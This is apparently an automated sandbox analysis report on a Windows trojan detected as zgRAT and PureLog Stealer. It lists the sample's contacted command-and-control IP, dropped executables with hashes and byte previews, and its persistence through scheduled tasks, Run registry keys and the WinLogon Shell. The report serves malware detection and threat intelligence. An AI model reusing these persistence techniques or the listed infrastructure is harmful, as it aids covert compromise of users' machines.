http://www.fontbureau.com/designers	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	false		high
http://193.58.121.137	cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	false		high
http://www.goodfont.co.kr	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	xu1yHoHXYs.33.dr	false		high
http://go.mic	cmd.exe, 0000002D.00000002.2713123527.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://www.jiyu-kobo.co.jp/	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	xu1yHoHXYs.33.dr	false		high
http://www.urwpp.deDPlease	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	false		high
http://www.zhongyicts.com.cn	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://193.58.H:	cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.58.121.137	unknown	Germany		210017	DCHASSELTBE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583905
Start date and time:	2025-01-03 20:46:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kJrNOFEGbQ.exe renamed because original name is a hash value
Original Sample Name:	36bbafbd00e62a37070764eb4ed93308.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@51/81@0/1
EGA Information:	Successful, ratio: 20%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.56.254.164, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target cmd.exe, PID 7572 because it is empty
Execution Graph export aborted for target cmd.exe, PID 7808 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 3868 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 5252 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7096 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7280 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7576 because it is empty
Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7960 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: kJrNOFEGbQ.exe

Simulations

Behavior and APIs

Time	Type	Description
14:47:39	API Interceptor	6774x Sleep call for process: cmd.exe modified
19:47:31	Task Scheduler	Run new task: cmd path: "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:47:31	Task Scheduler	Run new task: cmdc path: "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:47:31	Task Scheduler	Run new task: ruRRsbcJNKBbiFjvLZZICNpuYz path: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:47:31	Task Scheduler	Run new task: ruRRsbcJNKBbiFjvLZZICNpuYzr path: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:47:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:47:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:47:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:47:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:48:06	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:48:15	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:48:33	Autostart	Run: WinLogon Shell "C:\Users\All Users\SoftwareDistribution\cmd.exe"
19:48:41	Autostart	Run: WinLogon Shell "C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:48:50	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:48:59	Autostart	Run: WinLogon Shell "C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
19:49:07	Autostart	Run: WinLogon Shell "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.58.121.137	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DCHASSELTBE	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	193.58.121.137
	jIEphdoV3v.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	jIEphdoV3v.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	kdbG0dSi8w.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	kdbG0dSi8w.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	193.58.121.250
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	193.58.121.250
	AV4b38nlhN.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	AV4b38nlhN.exe	Get hash	malicious	Unknown	Browse	193.58.121.250
	WYU9WnEMkg.elf	Get hash	malicious	Mirai	Browse	193.58.122.184

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\ProgramData\SoftwareDistribution\cmd.exe	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\jDownloader\dca45fe6245a48

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with very long lines (517), with no line terminators
Category:	dropped
Size (bytes):	517
Entropy (8bit):	5.873117521822196
Encrypted:	false
SSDEEP:	12:F2yyeGyMrlTNr0UmRRIIAtfvqMPpJvxnr2kBaXdmYDn:IeGyM70UmzKDHNr23LDn
MD5:	A8465397C142EE252E812C00371A3F56
SHA1:	271198D9C75C4A05848BE4C913BBBC0624DE577E
SHA-256:	265916077D56951306FD15942D4939CD5A270F736F9E7D627315980A8E6C7AE4
SHA-512:	2F616CE645B75DBC599ADEA6AA15000420503EC8EAD326CF5102683798B8356FCCD2E8A9B198369F658669266ED17C88486DDA16ACF3D00D9E4CC76FA4EA57DB
Malicious:	false
Preview:	7ccCBrkIA9InzkgT5oLobPR7A4JgJNP54PQQWgKkc2KH2yGbOy0yzkDrKfBHhD8wuNtjUP6ZelLjFJELxsSVWaFULiG1eCCZ4XXoFhG82bUNYemAa0TzumZTIYXwJE4bjworwZGPlUc5G15r5FbosMoR7EgqKUyyg3om05OAtEOaKeNQdq0DmQsWHWts3ZFQfoZMNS0A1b4o8NHd0QNdevLQKRfdMgHU875fEACKz0MLVDY4OP1mLmwudJC6xWyUUkqBSmZzOCnoi94H3lP6oeIWLKB58GXdB11vXXlmzBYJ8HLdO4DMH1pzcUzIke1HpKmqIJtf9nGnG9YD8hqDCKVKLBTDhdBVKQdxfeVFKhMeuCtc5wJDxxFeycfG0q8gludzfkidMk2f71ZJS0HvU8iWL88D9OPeiq2Aj37VNp0N4jg7CVy9jNMnMGoglfe7VY6R9ZkY3vhoHVclcBAoaP4VeOxcOatsL31fnP7nvZGxphg1nDEjezgGdkxulHKcBzdNd

C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3680256
Entropy (8bit):	7.823453943837237
Encrypted:	false
SSDEEP:	49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
MD5:	C47F34E03D2A705E84CCB97C250966F2
SHA1:	77C3F5F6B13A267C76D5D716FC568F243C5606EE
SHA-256:	FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
SHA-512:	0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: VqGD18ELBM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N..........8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...

C:\ProgramData\SoftwareDistribution\cmd.exe

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3680256
Entropy (8bit):	7.823453943837237
Encrypted:	false
SSDEEP:	49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
MD5:	C47F34E03D2A705E84CCB97C250966F2
SHA1:	77C3F5F6B13A267C76D5D716FC568F243C5606EE
SHA-256:	FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
SHA-512:	0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: VqGD18ELBM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N..........8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...

C:\ProgramData\SoftwareDistribution\ebf1f9fa8afd6d

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with very long lines (724), with no line terminators
Category:	dropped
Size (bytes):	724
Entropy (8bit):	5.869322955305929
Encrypted:	false
SSDEEP:	12:HLKnIfiNjkzShlMoX0ntChUiuI4TctAdQrZqbEqrrg/FWGxIPmLFH:HLKIfToMoknty4TctAddRoxHx
MD5:	FA15154E22D9F701F5C32F33540B4B69
SHA1:	1D921D7052189DB635DFD213B73F8451A09B10E2
SHA-256:	6A4374E018EA624083337A475B5351016A66EF433E2770C93C088A6DE13C6BFF
SHA-512:	676B1068B211DA748C067A8DC93519F38CC71C24CABCF801F7F1442E84B3CAC3062B16B22470CB86E01A47C9F905593790C59E69CAC432F6FA9BB01D1D82F718
Malicious:	false
Preview:	fekEuzLrn4Kk2jCB8SohYvdLDJl7hfvN6zFDa8yDWKrhQTa2dwB18tUuAZBlNNKII7oCd9k9dlLOE64ustdve4OMfVCB7NzI9iYSoYYeLCXXiFpEeQ2etZnOsbgH6jBQvCOfhmFUU9jch1naq7gqUUYk5JkN1QhlAGlg0Jh2LiJuzLr0yGb8DU5anokXB2cEb8baQGjgaofvLovtctZvziiqLL3MjJ0TGFT0tQkrg4iZzJP8215RcqO2avPENX7RxLpFV59LJsO4AI0B54TrOj0Z0aZ8BfdJ7RmneKn71tIucU2R4OISDPDOUQO4fBKnOF6tgMgvQW0eaF7giIDxWKFsOXSO5tb0iegWYIurrXCqZixOSsWX7XQD9OfI3S0h4965jkHZXVF9IZTpkE5NWE2LNcXJnmxZgevZl1psk69mRR5k5zizXnK0HurHN8vuhqdnn3EsYMmZEQ46gwOyD7B3T5R1JifmLOEkyR6BvzbKAvv00vkau7rjojUrmMi0rAOzLTIP0MDOg12iKaAY7E1Nhe5O7OZiQkcAg5phmVkh4dCxrvhLMK2mIASqX4Rlxe76Y1BOvdvmeUTEcIgMqNWGr01gn8JsE8uZfGYzuSZtYQHyrNOOXF4jI0Oi9flxTDigj3iVurcYxnsbsDzat5V9ELRp2zzOrmZVrlPxo3eqmgvfIw06qLDXrjcYm3c41NqKNWtHyBv0apWhZvhG

C:\Recovery\dca45fe6245a48

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with very long lines (519), with no line terminators
Category:	dropped
Size (bytes):	519
Entropy (8bit):	5.870780278174751
Encrypted:	false
SSDEEP:	12:/mIs3DSx2UNor/oX2simllyGqqo05rgL/X7RyotohAuODHh:/mDGLqwXFimry8oYSkOh
MD5:	17606C9489BCA5DB35BD72E843D365B4
SHA1:	DBE1C31A53995A7B80FE202B6E390202911CEC40
SHA-256:	CA8678B48134203C704E6C2D74FAEE69642DB4C2A32A78B0A0BE2F1815C12317
SHA-512:	664D64771B62A41345B50F94AA15D734EEE6FB87EA6F2DEFC5BC76E779CC6676A2915E78D134368B04362CD4A3C421904517CAFACA53E3F9C545B111C421A76D
Malicious:	false
Preview:	NMW5ssNbvgZ67y0NhmcDqQx9OMNE2knriLvpIBs3sgGzfbCey3wAmhz6YXqfeIiK3rXwDLEf3iVKK8exJtQ9xmFAVyQvUMZj756xDQamyRGEMowa23Wu2jWQlWaP4TLrIvMOBqt2SnKggByrB02b0orYiqMq0LsfFY5abhYMJdbPZ0ukisNDat1dEypVeDBH4oaHFXPebqSWMc9s6lIH8oFWhbWn1DsGbUUuZmeKdsmubeRmz6Z244JQiEjoBmmY8M42HOTTH7oPCV5CKtx4nzLhKELUD0I1GNvOkYeknGv7P4ONIgdRysuIBXrDC8PQyxIyjqcvPNRhEORQz8MgW1CYcnNMqaho0eIcvZocErCkaNEwFbNEwt47uuV6dPFypmqjFzeaUucoyb7PiaHONd2HkKrADr8ymO5xgfqQ7xtCRPITxGXCI0lMuj85HdWmvnCkgJtDt0QZtz0VBYN7U5pwmtD6gvIeaHQnNhwoWTTRjLc5tn3tQYRz7Q8xGwh7sw8miMI

C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3680256
Entropy (8bit):	7.823453943837237
Encrypted:	false
SSDEEP:	49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
MD5:	C47F34E03D2A705E84CCB97C250966F2
SHA1:	77C3F5F6B13A267C76D5D716FC568F243C5606EE
SHA-256:	FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
SHA-512:	0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: VqGD18ELBM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N..........8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...

C:\Users\Public\Libraries\dca45fe6245a48

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with very long lines (769), with no line terminators
Category:	dropped
Size (bytes):	769
Entropy (8bit):	5.896684655616314
Encrypted:	false
SSDEEP:	24:i+68uhvnZ/sfi+++6j/tz0OE+kp8GvN+Qul:ixNsvt6znE584N+l
MD5:	4ED46F80560AE704223873D560E73B1D
SHA1:	9E5C385926114320489CB932C2BF939215AC1AC5
SHA-256:	08B3000FAD9F3F2B2398AE49234AB4C6294DD060EF6D2499F107AA8655039736
SHA-512:	58333597086DE26E4BD0D907D93A892724D86233A99057198B61D16AD4AAA56BD3AC665B701CBE541BD76A0644A3FD819B36B5A08900D53F087471A0541DD753
Malicious:	false
Preview:	CtIoZN7CN491VW48oKlLsl7719Z006rydvDQv3GWEl5O1TZEp0up9HCbvKxZxGLQMKXjToNvEPGHptGhkVLALCzWtlekGqi7ZoCr5zuAn9ltA5vCDPzc5LEKVB0rJmoXrIsArZmukLXMaGVxzcg10GCNk1V39D0AUNC1NvVomF1uy2tOqC1rFxhkFeazDsvhUW1MDdkEH2OvOSZsHHN6LJ5hqbvtUfl3UUZcAgLMcxkNivVxEsr6fyVLaUgmr1ulQUa436rk5BdYjs84F8olypYf8OBqAielC96OVa3HAGAdU7mrVlgsNIwl556o5BkWh2VkwujoEglro5KAmTUYCvX4MUSaePM9gn6clC5lC1nqhF6Au5ClqLUvebXbbJKzTlLB9sZkYtWKHqXGXSpiMlTUSK7KodJ2ryX545ACgcN6zJoxDREJdmnsS0syuO54kddTTbMcRnBtYWfJfJGWZAYFKpnDMLRSgSWVqVemFl10k3T5VjSlHjfjEYIoyIPFVtNGAJcKpeRxJieQVrrn2pK7wwQRM0y6Vve1qN5MGI6nRrag31SGbmMqiPTN2K8yqUbXDnkHwfguthpEVuYUirftiySb4rT5JH66QDdQRKT5Gc6BjO1IwnQ8zsyOUINFLkklksySQHCXYjmG1R1pzKJg18HhOO6I7Otg1Va1Zj2ok2kPFsWCRhPBaEumlRECL4aJ0GPg0AQQSe58Y1bf131Z9sFwkyPIezdqcaZ9d0LRR9s6JvNtziLRCAKHBc6Cu

C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3680256
Entropy (8bit):	7.823453943837237
Encrypted:	false
SSDEEP:	49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
MD5:	C47F34E03D2A705E84CCB97C250966F2
SHA1:	77C3F5F6B13A267C76D5D716FC568F243C5606EE
SHA-256:	FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
SHA-512:	0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N..........8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...

